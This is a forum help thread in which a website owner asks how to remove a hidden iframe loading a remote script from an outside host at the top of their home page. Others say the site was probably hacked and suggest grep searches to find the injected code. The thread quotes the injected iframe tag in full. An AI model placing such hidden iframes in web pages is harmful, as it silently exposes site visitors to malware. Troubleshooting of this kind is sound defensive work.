problem facing with <iframe> tag in my site home page

Hello,
My sites home page having <iframe src="http://u1w.in:8080/ts/in.cgi?pepsi111" width=125 height=125 style="visibility: hidden"></iframe> at the top of the page . but when I download it from the server it does not exists ... so how to remove that code? please help me ASAP.
Thanks

Cappsys

 

Give your website URL. Is it a blog ??

 

http://www.liffeyartefacts.com/

 

You can't just remove this part from your HTML code ????

 

You are right but when i download the index.php page from FTP ... then it doesn't found in the page.
If I am opening in browser window and view the source then it is showing at the top. this is the main problem. So how to find the code that where it is actually located.
I checked all the related file but could not found.

 

Maybe this part of code is generated from javascript - you can try turn off javascript in your browser and then check this.
No it is not javascript... i test this.

Are you using some CMS system??

 

My problem has been solved for temporary. I used CSS i.e.
iframe{display:none} for index.php.

thanks

bye

 

does the index.php have any includes / requires? any Server Side Includes? Anything hidden / encrypted?

 

Your website was probably hacked, just hiding it with CSS may appear to have solved the problem, but it really isn't.

 

premiumscripts is Right!

You will get tagged as Malicious by Search Engine and mozilla browser will give annoying message to your visitors.

if you have SSH access to find it just do: grep -Rl 'in.cgi' *

Most probably, iframe is in your theme index page.

 

Hello Premiumscripts,

I have run below command on SSH and got the as under mentioned.

grep -Rl 'in.cgi' *

Result: perl588installer/perl-5.8.8/lib/CGI/Changes
perl588installer/perl-5.8.8/Changes5.8
resultcgi.txt

What to do now ?

Please help.


Thanks

Khalid

 

Hmm, Result is not like xcepted.

Run this in your home directory For ex: /var/www/yourdomain.com
grep -Rl 'u1w.in' *

If still you did not find anything most probably this iframe is encoded. So code in page is different and when accessed via browser it excuted as iframe.

I checked your website source and iframe is just above <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

Did you check your header.php, theme ?